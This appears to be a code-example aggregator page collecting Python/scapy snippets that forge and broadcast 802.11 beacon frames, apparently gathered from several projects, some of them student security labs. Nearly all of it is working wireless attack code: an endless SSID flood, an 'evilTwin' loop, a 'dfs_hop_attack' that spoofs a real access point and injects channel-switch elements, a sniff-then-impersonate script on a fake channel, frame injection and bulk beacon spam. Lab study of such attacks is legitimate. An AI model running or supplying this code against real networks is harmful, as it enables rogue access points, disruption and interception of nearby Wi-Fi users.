コード例 #1
    def send_beacon_ex(essid,
                       interface,
                       privacy=PRIVACY_NONE,
                       bssid=None,
                       channel=6):
        """Build a single beacon frame and hand it to ``sendp`` once.

        Stand-alone helper: no thread and no instance are involved.

        Args:
            essid: Value placed in the SSID element.
            interface: Interface passed to ``sendp``; also used to look up the
                BSSID through ``getHwAddr`` when ``bssid`` is falsy.
            privacy: One of the PRIVACY_* constants or the strings
                'none'/'NONE', 'wep'/'WEP', 'wpa'/'WPA'. It only selects the
                advertised capability bits and elements; no key material is
                handled here.
            bssid: Address used for both addr2 and addr3.
            channel: Integer written into the DS Parameter Set element.

        Raises:
            Exception: ``privacy`` matches none of the accepted values.
        """
        source_mac = bssid or getHwAddr(interface)
        ds_channel = chr(channel)
        # A fresh Sequence Control value is drawn on every call, so frames from
        # repeated calls do not carry a steadily increasing counter.
        seq_ctrl = randint(1200, 2000)

        if privacy in (PRIVACY_NONE, 'none', 'NONE'):
            capabilities = 'ESS+short-preamble+short-slot'
            advertise_wpa = False
        elif privacy in (PRIVACY_WEP, 'wep', 'WEP'):
            capabilities = 'ESS+privacy+short-preamble+short-slot'
            advertise_wpa = False
        elif privacy in (PRIVACY_WPA, 'wpa', 'WPA'):
            capabilities = 'ESS+privacy+short-preamble+short-slot'
            advertise_wpa = True
        else:
            raise Exception('Invalid privacy setting')

        # Part shared by all three variants: broadcast destination, the same
        # address as transmitter and BSSID, then SSID / rates / channel.
        beacon = (
            RadioTap()
            / Dot11(addr1="ff:ff:ff:ff:ff:ff",
                    addr2=source_mac,
                    addr3=source_mac,
                    SC=seq_ctrl)
            / Dot11Beacon(cap=capabilities)
            / Dot11Elt(ID="SSID", info=essid)
            / Dot11Elt(ID="Rates", info='\x82\x84\x8b\x96\x0c\x12\x18\x24')
            / Dot11Elt(ID="DSset", info=ds_channel)
        )

        if advertise_wpa:
            # Two vendor-specific elements (ID 221) under OUI 00:50:f2 wrap the
            # ID 42 / ID 50 elements; presumably the WPA and WMM elements --
            # confirm against the element definitions.
            beacon = (
                beacon
                / Dot11Elt(ID=221,
                           info="\x00\x50\xf2\x01\x01\x00" + "\x00\x50\xf2\x02" +
                           "\x01\x00" + "\x00\x50\xf2\x02" + "\x01\x00" +
                           "\x00\x50\xf2\x01")
                / Dot11Elt(ID=42, info="\x00")
                / Dot11Elt(ID=50, info="\x30\x48\x60\x6c")
                / Dot11Elt(
                    ID=221,
                    info="\x00\x50\xf2\x02\x01\x01\x84\x00\x03\xa4\x00\x00\x27\xa4\x00\x00\x42\x43\x5e\x00\x62\x32\x2f\x00")
            )
        else:
            # Open and WEP variants differ only in the capability string above.
            beacon = (
                beacon
                / Dot11Elt(ID=42, info="\x04")
                / Dot11Elt(ID=47, info="\x04")
                / Dot11Elt(ID=50, info="\x0c\x12\x18\x60")
            )

        sendp(beacon, iface=interface, verbose=False)
コード例 #2
    def setPrivacy(self, value):
        """Rebuild ``self.beacon`` for the open, WEP or WPA advertisement.

        Reads ``self.bssid``, ``self.essid`` and ``self.channel``. Only the
        advertised capability bits and elements change; no key material is
        handled here. A ``value`` other than PRIVACY_NONE, PRIVACY_WEP or
        PRIVACY_WPA leaves ``self.beacon`` as it was.
        """
        if value == PRIVACY_NONE:
            capabilities = 'ESS+short-preamble+short-slot'
            advertise_wpa = False
        elif value == PRIVACY_WEP:
            capabilities = 'ESS+privacy+short-preamble+short-slot'
            advertise_wpa = False
        elif value == PRIVACY_WPA:
            capabilities = 'ESS+privacy+short-preamble+short-slot'
            advertise_wpa = True
        else:
            # No matching branch: nothing is assigned.
            return

        # Part shared by all three variants: broadcast destination, the same
        # address as transmitter and BSSID, then SSID / rates / channel.
        frame = (
            RadioTap()
            / Dot11(addr1="ff:ff:ff:ff:ff:ff",
                    addr2=self.bssid,
                    addr3=self.bssid)
            / Dot11Beacon(cap=capabilities)
            / Dot11Elt(ID="SSID", info=self.essid)
            / Dot11Elt(ID="Rates", info='\x82\x84\x8b\x96\x0c\x12\x18\x24')
            / Dot11Elt(ID="DSset", info=self.channel)
        )

        if advertise_wpa:
            # Two vendor-specific elements (ID 221) under OUI 00:50:f2 wrap the
            # ID 42 / ID 50 elements; presumably the WPA and WMM elements --
            # confirm against the element definitions.
            frame = (
                frame
                / Dot11Elt(ID=221,
                           info="\x00\x50\xf2\x01\x01\x00" + "\x00\x50\xf2\x02" +
                           "\x01\x00" + "\x00\x50\xf2\x02" + "\x01\x00" +
                           "\x00\x50\xf2\x01")
                / Dot11Elt(ID=42, info="\x00")
                / Dot11Elt(ID=50, info="\x30\x48\x60\x6c")
                / Dot11Elt(
                    ID=221,
                    info="\x00\x50\xf2\x02\x01\x01\x84\x00\x03\xa4\x00\x00\x27\xa4\x00\x00\x42\x43\x5e\x00\x62\x32\x2f\x00")
            )
        else:
            # Open and WEP variants differ only in the capability string above.
            frame = (
                frame
                / Dot11Elt(ID=42, info="\x04")
                / Dot11Elt(ID=47, info="\x04")
                / Dot11Elt(ID=50, info="\x0c\x12\x18\x60")
            )

        self.beacon = frame
def ssidFlood(ssid, senderMAC, channel):
    """Send a beacon for ``ssid`` repeatedly, one frame every 0.1 s.

    The frame is a broadcast management frame (type 0, subtype 8) with
    ``senderMAC`` as both transmitter and BSSID, the "ESS+privacy" capability
    bits, an SSID element and a DS Parameter Set element holding ``channel``.
    The interface comes from the module-level ``args.iface``. With ``loop=1``
    ``sendp`` keeps repeating the frame, so the call does not return by itself.
    """
    # NOTE(review): len=len(ssid) overrides scapy's computed element length and
    # counts characters, which may differ from the encoded byte length for a
    # non-ASCII ssid -- confirm the expected input type.
    frame = (
        RadioTap()
        / Dot11(type=0,
                subtype=8,
                addr1="ff:ff:ff:ff:ff:ff",
                addr2=senderMAC,
                addr3=senderMAC)
        / Dot11Beacon(cap="ESS+privacy")
        / Dot11Elt(ID="SSID", info=ssid, len=len(ssid))
        / Dot11Elt(ID="DSset", info=chr(channel))
    )
    sendp(frame, inter=0.1, iface=args.iface, verbose=False, loop=1)
コード例 #4
def evilTwin():
    """Send a beacon for the module-level ``ssid`` in an endless loop.

    The frame is a broadcast management frame (type 0, subtype 8) whose
    transmitter and BSSID fields both reference one ``RandMAC`` value, followed
    by a default ``Dot11Beacon`` and a single SSID element. It is sent on the
    module-level ``interface`` with verbose output; the loop has no exit
    condition and no delay between sends.
    """
    # NOTE(review): RandMAC is a scapy volatile value, so addr2 and addr3 may
    # not resolve to the same address when the frame is built -- confirm.
    spoofed_source = RandMAC()
    header = Dot11(type=0,
                   subtype=8,
                   addr1="FF:FF:FF:FF:FF:FF",
                   addr2=spoofed_source,
                   addr3=spoofed_source)
    ssid_element = Dot11Elt(ID="SSID", info=ssid)
    evil_twin = RadioTap() / header / Dot11Beacon() / ssid_element

    while True:
        sendp(evil_twin, iface=interface, verbose=True)
コード例 #5
def dfs_hop_attack(interface: MonitorInterface, ap: AP, essid: str, channel: int):
    """Inject a beacon carrying element ID 37 every 0.3 s, without end.

    The beacon uses ``ap.bssid`` as transmitter and BSSID, so it is addressed
    as if it came from that access point, and advertises ``essid`` with an RSN
    element. Element ID 37 carries the three bytes ``[0, channel, 1]``;
    presumably a Channel Switch Announcement (mode, new channel, count) --
    confirm against the element definition.

    NOTE(review): beacons are integrity-protected only where beacon protection
    is in use, so on the monitoring side the thing to look for is an ID 37
    element that the access point itself did not originate.

    Args:
        interface: Object whose ``inject`` method transmits the frame.
        ap: Object providing the ``bssid`` to place in addr2/addr3.
        essid: Value for the SSID element.
        channel: Second byte of the element ID 37 body.
    """
    rsn_body = (
        '\x01\x00'  # RSN version 1
        '\x00\x0f\xac\x04'  # Group cipher suite: 00-0f-ac CCMP
        '\x01\x00'  # Pairwise cipher suite count: 1 (suite on next line)
        '\x00\x0f\xac\x04'  # AES cipher
        '\x01\x00'  # Authentication key management suite count: 1
        '\x00\x0f\xac\x02'  # Pre-shared key
        '\xcc\x00'  # Supports and requires MFP
    )
    header = Dot11(type=0,
                   subtype=8,
                   addr1='ff:ff:ff:ff:ff:ff',
                   addr2=ap.bssid,
                   addr3=ap.bssid)
    ssid_element = Dot11Elt(ID='SSID', info=essid, len=len(essid))
    rsn_element = Dot11Elt(ID='RSNinfo', info=rsn_body)
    switch_element = Dot11Elt(ID=37, len=3, info=bytes([0, channel, 1]))

    pkt = (RadioTap() / header / Dot11Beacon(cap=0x9104)
           / ssid_element / rsn_element / switch_element)

    while True:
        interface.inject(pkt)
        sleep(0.3)
コード例 #6
ファイル: ex1.py プロジェクト: edinem/HEIGVD-SWI-Labo2-MAC-2
def generateFrame(wifiName, macAddr):
    '''
    Build (but do not send) a beacon frame from a network name and a MAC address.
    :wifiName: name of the Wi-Fi network to impersonate, placed in the SSID element
    :macAddr: MAC address to embed, used for both addr2 and addr3
    '''
    # Broadcast management frame, type 0 / subtype 8.
    header = Dot11(type=0,
                   subtype=8,
                   addr1="ff:ff:ff:ff:ff:ff",
                   addr2=macAddr,
                   addr3=macAddr)
    # The element length is set explicitly from the name's length.
    ssid_element = Dot11Elt(ID="SSID", info=wifiName, len=len(wifiName))
    return RadioTap() / header / Dot11Beacon(cap="ESS+privacy") / ssid_element
コード例 #7
ファイル: packets.py プロジェクト: nask0/opparis
def ssid_packet():
    """Return the raw bytes of a beacon frame wrapped in an A-MPDU-style delimiter.

    Nothing is transmitted here; the function only builds and returns a string.
    It relies on module-level ``CHANNEL``, ``AP_RATES``, ``get_frequency`` and
    ``dot11crc``, none of which are visible in this excerpt.

    NOTE(review): ``str(packet)`` and ``str / Packet`` composition behave this
    way under Python 2 era scapy; confirm the target interpreter.
    """
    # All-zero address used as both transmitter and BSSID.
    ap_mac = '00:00:00:00:00:00'
    # NOTE(review): ``rt`` is built but never referenced again in this function.
    rt = RadioTap(len=18,
                  present='Flags+Rate+Channel+dBm_AntSignal+Antenna',
                  notdecoded='\x00\x6c' + get_frequency(CHANNEL) +
                  '\xc0\x00\xc0\x01\x00\x00')
    # Broadcast beacon with a fixed SSID string, the configured rates and channel.
    beacon_packet = Dot11(subtype=8, addr1='ff:ff:ff:ff:ff:ff', addr2=ap_mac, addr3=ap_mac) \
                 / Dot11Beacon(cap=0x2105)                                                           \
                 / Dot11Elt(ID='SSID', info="injected SSID")                                         \
                 / Dot11Elt(ID='Rates', info=AP_RATES)                                               \
                 / Dot11Elt(ID='DSset', info=chr(CHANNEL))

    # Update sequence number
    beacon_packet.SC = 0x3060

    # Update timestamp
    beacon_packet[Dot11Beacon].timestamp = time.time()

    # Length is taken after SC and timestamp are set; the extra 4 presumably
    # accounts for the checksum that dot11crc appends -- TODO confirm.
    mpdu_len = len(beacon_packet) + 4

    # Padding is derived from the unshifted length, so it must be computed
    # before the shift below.
    if mpdu_len % 4 != 0:
        padding = "\x00" * (4 - (mpdu_len % 4))  # Align to 4 octets
    else:
        padding = ""
    # Move the length into the upper bits of the 16-bit field packed below,
    # leaving the low four bits zero.
    mpdu_len <<= 4
    # 8-bit CRC (polynomial 0b100000111, reflected, final XOR 0xFF) computed
    # over the two packed length bytes only.
    crc_fun = crcmod.mkCrcFun(0b100000111, rev=True, initCrc=0x00, xorOut=0xFF)

    crc = crc_fun(struct.pack('<H', mpdu_len))
    maccrc = dot11crc(str(beacon_packet))
    # Delimiter signature byte (labelled "delim" in the debug print below).
    delim_sig = 0x4E

    #print('a-mpdu: len %d crc %02x delim %02x' % (mpdu_len >> 4, crc, delim_sig))
    #hexdump(maccrc)
    # 4-byte header: little-endian length field, CRC byte, signature byte.
    ampdu_header = struct.pack('<HBB', mpdu_len, crc, delim_sig)
    #hexdump(ampdu_header)

    # header + frame + frame checksum + alignment padding, followed by eight
    # repetitions of a fixed 4-byte pattern (presumably zero-length delimiters
    # -- TODO confirm).
    data = ampdu_header / beacon_packet / maccrc / padding
    data /= "\x00\x00\x20\x4e" * 8
    data = str(data)

    return data
コード例 #8
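def rnd_aps(iface):
    """Send beacons for each name in ``LEL_AP`` in rotation until interrupted.

    One layer-2 socket is opened on ``iface`` and reused for every frame. Each
    beacon is broadcast with the "ESS" capability, an SSID of ``b"VOTA "``
    followed by the current ``LEL_AP`` entry, a rates element and a DS
    Parameter Set element fixed to channel 1. All of addr2, addr3 and addr4
    reference the same ``RandMAC`` value. The loop sleeps 1 ms between frames
    and only ends when sending raises or the process is interrupted.

    Any ``Exception`` raised inside the loop is printed and ends the loop. The
    socket is closed on every exit path; previously it was closed only in the
    ``except Exception`` branch, so a KeyboardInterrupt left it open.

    Args:
        iface: Interface name handed to ``conf.L2socket``.
    """
    s = conf.L2socket(iface=iface)

    # NOTE(review): RandMAC is a scapy volatile value, so the address fields
    # may not resolve to the same value when a frame is built -- confirm.
    rnd_mac = RandMAC()
    itx = 0

    try:
        while True:
            s.send(
                RadioTap() / Dot11(addr1="ff:ff:ff:ff:ff:ff",
                                   addr2=rnd_mac,
                                   addr3=rnd_mac,
                                   addr4=rnd_mac) / Dot11Beacon(cap="ESS") /
                Dot11Elt(ID="SSID", info=b"VOTA " + LEL_AP[itx]) /
                Dot11Elt(ID="Rates", info="\x0c\x12\x18\x24\x30\x48\x60\x6c") /
                Dot11Elt(ID="DSset", info=chr(1)))
            # Wrap around so the list is cycled indefinitely.
            itx = (itx + 1) % len(LEL_AP)
            time.sleep(0.001)
    except Exception as e:
        print(e)
    finally:
        # Runs for Exception and for KeyboardInterrupt/SystemExit alike.
        s.close()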
コード例 #9
ファイル: send-wep.py プロジェクト: molliemurray/scapy-WEP
# Re-parse the packet from its string form with the last four bytes dropped.
# NOTE(review): the name ``input`` shadows the builtin, and the result is not
# used again in the visible part of the script.
input = wepPkts.__class__(str(wepPkts)[:-4])
sendp(wepPkts)

# --- Plain 802.11 data frame carrying an ICMP packet ---
sender = '08:00:27:c6:e4:20'
dest = '08:00:27:1b:8b:a3'
packet = (
    Dot11(addr1=dest, addr2=sender, addr3=sender)
    / LLC()
    / SNAP()
    / IP(src="192.168.3.7", dst="192.168.3.5")
    / ICMP()
    / "Hello!"
)
print(packet.summary())
sendp(packet)

# Same frame after wepEncrypt. The second argument is a literal in the source,
# presumably the WEP key -- confirm against wepEncrypt's definition.
encPkt = wepEncrypt(packet, '0123456789')
print(encPkt.summary())
sendp(encPkt)

# --- Broadcast beacon with a fixed SSID ---
SSID = 'Test SSID'
# NOTE(review): unlike the sendp calls above, the beacon is sent on an explicit
# interface name.
iface = 'eth0'
dot11 = Dot11(
    type=0,
    subtype=8,
    addr1='ff:ff:ff:ff:ff:ff',
    addr2=sender,
    addr3=sender,
)
beacon = Dot11Beacon()
essid = Dot11Elt(ID='SSID', info=SSID, len=len(SSID))
frame = RadioTap() / dot11 / beacon / essid
print(frame.summary())
sendp(frame, iface=iface)

コード例 #10
# Capture phase: every sniffed packet goes to PacketHandler, which presumably
# fills ap_list and ap_ssidToChannel (defined outside this excerpt). No count
# or timeout is given to sniff here.
sniff(iface=iface, prn=PacketHandler)

# Selection phase: the operator picks one entry, numbered from 1.
choice = inputNumber(
    "Please select the target (1-%d): " % (len(ap_list)),
    1,
    len(ap_list),
)
ssid = ap_list[choice - 1]
realChannel = ap_ssidToChannel[ssid]

# The advertised channel is always six away from the observed one: below it
# when the observed channel is above 6, above it otherwise.
if realChannel > 6:
    fakeChannel = realChannel - 6
else:
    fakeChannel = realChannel + 6

print(
    "Sending a fake beacons with SSID %s, channel %d (real channel is %d) (10/second)"
    % (ssid, fakeChannel, realChannel))

# Beacon: broadcast destination, one RandMAC value referenced by both the
# transmitter and BSSID fields, "ESS+privacy" capability, the selected SSID
# and the computed channel in the DS Parameter Set element.
sender_mac = RandMAC()
dot11 = Dot11(
    type=0,
    subtype=8,
    addr1="ff:ff:ff:ff:ff:ff",
    addr2=sender_mac,
    addr3=sender_mac,
)
beacon = Dot11Beacon(cap="ESS+privacy")
essid = Dot11Elt(ID="SSID", info=ssid, len=len(ssid))
echann = Dot11Elt(ID="DSset", info=chr(fakeChannel))
frame = RadioTap() / dot11 / beacon / essid / echann

# loop=1 with inter=0.1 repeats the frame every 0.1 s until interrupted.
sendp(frame, inter=0.1, iface=iface, loop=1)
コード例 #11
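def _build_rsn_beacon(bssid, ssid):
    """Return a beacon frame for ``ssid`` with ``bssid`` in addr3 and an RSN element."""
    # addr2 is a fixed literal; only addr3 follows the requested address.
    dot11 = Dot11(type=0, subtype=8, addr1='ff:ff:ff:ff:ff:ff', addr2='22:22:22:22:22:22',
                  addr3=bssid)

    beacon = Dot11Beacon(cap='ESS+privacy')

    essid = Dot11Elt(ID='SSID', info=ssid, len=len(ssid))

    rsn = Dot11Elt(ID='RSNinfo', info=(
        '\x01\x00'          # RSN version 1
        '\x00\x0f\xac\x02'  # group cipher suite
        '\x02\x00'          # two pairwise cipher suites follow
        '\x00\x0f\xac\x04'
        '\x00\x0f\xac\x02'
        '\x01\x00'          # one key management suite follows
        '\x00\x0f\xac\x02'
        '\x00\x00'))        # RSN capabilities

    return RadioTap() / dot11 / beacon / essid / rsn


def send_beacon(iface, ssid, mac_address, count, list_path):
    """Send beacon frames for one SSID or for every entry of a JSON list file.

    With ``list_path`` set, the file is parsed as JSON and, for each of
    ``count`` rounds, one beacon is sent per entry using the entry's ``'mac'``
    and ``'ssid'`` keys. Without it, a single beacon for ``ssid`` and
    ``mac_address`` is built and sent ``count`` times. Every frame is printed
    with ``show()`` before it is sent.

    The list file is now opened in a ``with`` block so the handle is closed
    after parsing; it was previously left open. The two copies of the
    frame-building code are shared through ``_build_rsn_beacon``.

    Args:
        iface: Interface passed to ``sendp``.
        ssid: SSID for the single-beacon case; ``None`` takes the value
            returned by ``random_mac()``.
        mac_address: addr3 for the single-beacon case; ``None`` takes the
            value returned by ``random_mac()``.
        count: Number of rounds / repetitions; ``None`` means 1.
        list_path: Path to a JSON file holding a list of objects with
            ``'mac'`` and ``'ssid'`` keys, or ``None``.

    Raises:
        KeyError: a list entry lacks ``'mac'`` or ``'ssid'``.
    """
    if count is None:
        count = 1

    if ssid is None:
        ssid = random_mac()

    if mac_address is None:
        mac_address = random_mac()

    if list_path is not None:
        with open(list_path) as list_file:
            data = json.load(list_file)

        for _ in range(count):
            for entry in data:
                frame = _build_rsn_beacon(entry['mac'], entry['ssid'])
                frame.show()
                sendp(frame, iface=iface, count=1)
        return

    frame = _build_rsn_beacon(mac_address, ssid)
    frame.show()
    sendp(frame, iface=iface, count=count)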